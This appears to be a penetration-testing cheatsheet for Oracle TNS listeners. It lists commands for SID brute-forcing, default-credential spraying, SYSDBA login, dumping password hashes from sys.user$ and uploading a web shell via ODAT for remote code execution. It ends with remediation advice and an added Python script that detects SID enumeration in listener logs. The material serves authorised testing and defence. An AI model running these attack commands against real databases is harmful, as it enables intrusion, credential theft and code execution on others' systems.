🛡️ Methodology Checklist
- Detect Oracle TNS: nmap -p 1521 --script oracle-tns-version [TARGET]
- Enumerate SIDs: nmap -p 1521 --script oracle-sid-brute [TARGET]
- Or use ODAT: odat sidguesser -s [TARGET]
- Default creds: scott/tiger, sys/oracle, system/manager
- Brute-force with ODAT: odat passwordguesser -s [TARGET] -d [SID]
- If authenticated: enumerate tables, extract data
- Upload/execute via ODAT: odat utlfile, odat dbmsscheduler
- Check for OS command execution via JAVA/extproc
🎯 Operational Context
Think Dumber First: Try the SIDs XE, ORCL, DB and TEST before running a full brute-force — these are the most common Oracle SIDs. After SID confirmation, spray scott/tiger, system/manager and sys/change_on_install. These Oracle factory defaults persist in many corporate environments. ODAT is your all-in-one Oracle exploitation toolkit.
When you land here: Port 1521 open. Confirm Oracle TNS listener: tnscmd10g version -h [TARGET]. Enumerate SIDs with odat sidguesser or nmap --script oracle-sid-brute. After SID obtained, authenticate and escalate privileges.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| sudo nmap -p1521 -sV [TARGET_IP] --open | Detect Oracle TNS listener |
| sudo nmap -p1521 -sV [TARGET_IP] --open --script oracle-sid-brute | Brute-force Oracle SID |
| ./odat.py all -s [TARGET_IP] | Run all ODAT modules — find credentials and misconfigs |
| sqlplus scott/tiger@[TARGET_IP]/XE | Connect to Oracle DB with credentials |
| sqlplus scott/tiger@[TARGET_IP]/XE as sysdba | Connect as SYSDBA (privilege escalation attempt) |
| select table_name from all_tables; | List all tables (inside SQL> prompt) |
| select * from user_role_privs; | Check current user privileges |
| select name, password from sys.user$; | Dump password hashes |
| python3 ./odat.py utlfile -s [TARGET_IP] -d XE -U scott -P tiger --sysdba --putFile C:\inetpub\wwwroot testing.txt ./testing.txt | Upload file via ODAT (RCE via web shell) |
| curl -X GET http://[TARGET_IP]/testing.txt | Verify uploaded file is accessible |
| sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf"; sudo ldconfig | Fix shared library error for sqlplus |
🔬 Deep Dive & Workflow
Initial Enumeration
- Nmap detect listener: sudo nmap -p1521 -sV [TARGET_IP] --open
- Brute-force SID: sudo nmap -p1521 --script oracle-sid-brute [TARGET_IP]
- Run ODAT all modules: ./odat.py all -s [TARGET_IP]
- Try default credentials: scott/tiger, dbsnmp/dbsnmp, CHANGE_ON_INSTALL
- Connect with sqlplus: sqlplus [USER]/[PASS]@[TARGET_IP]/[SID]
Attacks
- Attempt SYSDBA login: sqlplus [USER]/[PASS]@[TARGET_IP]/[SID] as sysdba
- Enumerate privileges: select * from user_role_privs;
- Dump password hashes: select name, password from sys.user$;
- Upload web shell via the ODAT utlfile module to the IIS/Apache web root
- Verify RCE: curl -X GET http://[TARGET_IP]/[UPLOADED_FILE]
Core Concept
Oracle TNS (Transparent Network Substrate) facilitates connections between Oracle databases and applications. It supports SSL/TLS, IPv6, connection management and load balancing.
Critical: A valid SID (System Identifier) is required to connect. Without it, connection is often impossible.
Configuration Files ($ORACLE_HOME/network/admin)
| File | Side | Purpose |
|---|---|---|
| tnsnames.ora | Client | Resolves service names to IP/Port |
| listener.ora | Server | Defines listener and services |
| PlsqlExclusionList | Server | Blacklist for PL/SQL packages |
Default Credentials
| Product | Username | Password |
|---|---|---|
| Oracle 9 | — | CHANGE_ON_INSTALL |
| DBSNMP service | dbsnmp | dbsnmp |
| Classic | scott | tiger |
Tool Setup (ODAT)
git clone https://github.com/quentinhardy/odat.git
cd odat/
pip install python-libnmap cx_Oracle
git submodule init && git submodule update
sudo pip3 install colorlog termcolor passlib pycryptodome
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| odat returns ‘connection refused’ on 1521 | Non-standard TNS port or listener paused | Check ports 1521-1530 with nmap; try lsnrctl status if local access; use tnscmd10g ping -h [TARGET] to test listener |
| SID brute-force returns no results | Very uncommon SID used | Use full SecLists oracle-sids.txt (2000+ entries); try enumerating via TNS listener directly: tnscmd10g tnsping -h [TARGET] |
| sqlplus ‘ORA-12170: Connect timeout occurred’ | TNS listener filtering by source IP | Confirm TCP/1521 reachable: nc -nv [TARGET] 1521; try from a pivot host in the allowed subnet |
| TNS Poison attack has no effect | Oracle 11g R2+ patched (2010+) | Check listener version: tnscmd10g version -h [TARGET]; TNS Poison only viable on pre-11gR2; escalate via credential attacks instead |
| odat results inconsistent between runs | Session limit on listener or rate limiting | Reduce odat threads: --threads 1; add delay; use --sysdba flag for elevated context |
📝 Reporting Trigger
Finding Title: Oracle TNS Listener with Default Credentials / Unauthenticated Enumeration
Impact: DBA-level database access via default credentials — full schema read/write, OS command execution via DBMS_SCHEDULER or external procedures, and potential lateral movement via linked databases.
Root Cause: Oracle factory default credentials (scott/tiger, system/manager) not rotated. TNS listener accessible without authentication, enabling SID enumeration.
Recommendation: Rotate all Oracle default accounts immediately. Restrict TNS listener access by IP. Set a listener password (lsnrctl set password). Disable external procedures if unused. Enable Oracle Audit to log all connection attempts.
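Added defensive example, not part of the original cheatsheet: the SID brute-force from the checklist above shows up in the listener's listener.log as a burst of TNS-12505/12514 rejections from one source host, which is what the audit recommendation should be catching. The script below parses constructed log lines in that layout and flags hosts that requested several distinct unknown SIDs within one minute; the sample lines, hosts and threshold are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample listener.log lines (not captured from a real system). The layout
# follows Oracle's listener log: timestamp * connect data * address * action * service * code.
SAMPLE_LOG = """\
24-JUN-2024 14:22:01 * (CONNECT_DATA=(SERVICE_NAME=XE)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=oracle))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.0.20)(PORT=50010)) * establish * XE * 0
24-JUN-2024 14:22:02 * (CONNECT_DATA=(SID=ORCL)) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.0.99)(PORT=41001)) * establish * ORCL * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
24-JUN-2024 14:22:02 * (CONNECT_DATA=(SID=DB)) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.0.99)(PORT=41002)) * establish * DB * 12505
24-JUN-2024 14:22:03 * (CONNECT_DATA=(SID=TEST)) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.0.99)(PORT=41003)) * establish * TEST * 12505
24-JUN-2024 14:22:03 * (CONNECT_DATA=(SID=PROD)) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.0.99)(PORT=41004)) * establish * PROD * 12505
24-JUN-2024 14:22:04 * (CONNECT_DATA=(SID=XE)) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.0.99)(PORT=41005)) * establish * XE * 0
24-JUN-2024 14:40:00 * (CONNECT_DATA=(SID=ORCL)) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.0.31)(PORT=52000)) * establish * ORCL * 12505
"""

# One "establish" line: timestamp, then the source HOST inside the ADDRESS clause,
# then the requested SID/service and the listener return code at the end.
LINE_RE = re.compile(
    r"^(?P<ts>\d{2}-[A-Z]{3}-\d{4} \d{2}:\d{2}:\d{2}) \* .*?"
    r"\(ADDRESS=.*?\(HOST=(?P<host>[^)]+)\).*?\) \* establish \* (?P<sid>\S+) \* (?P<code>\d+)$"
)
UNKNOWN_SID_CODES = {"12505", "12514"}  # unknown SID / unknown service name

def parse_listener_log(text):
    """Return (timestamp, source host, requested SID, return code) per connect line."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:  # skip TNS-xxxx detail lines and anything that is not a connect record
            continue
        ts = datetime.strptime(m["ts"], "%d-%b-%Y %H:%M:%S")
        events.append((ts, m["host"], m["sid"], m["code"]))
    return events

def detect_sid_enumeration(events, threshold=3, window=timedelta(seconds=60)):
    """Flag hosts that were rejected for >= threshold distinct SIDs within one window."""
    by_host = defaultdict(list)
    for ts, host, sid, code in events:
        if code in UNKNOWN_SID_CODES:
            by_host[host].append((ts, sid))
    alerts = {}
    for host, tries in by_host.items():
        tries.sort()
        for i, (start, _) in enumerate(tries):  # sliding window over the host's failures
            sids = {s for t, s in tries[i:] if t - start <= window}
            if len(sids) >= threshold:
                alerts[host] = sorted(sids)
                break
    return alerts
```

A single rejection from 10.0.0.31 is a typo-level event and is left alone; 10.0.0.99 cycling through four unknown SIDs in two seconds is the guessing pattern worth an alert.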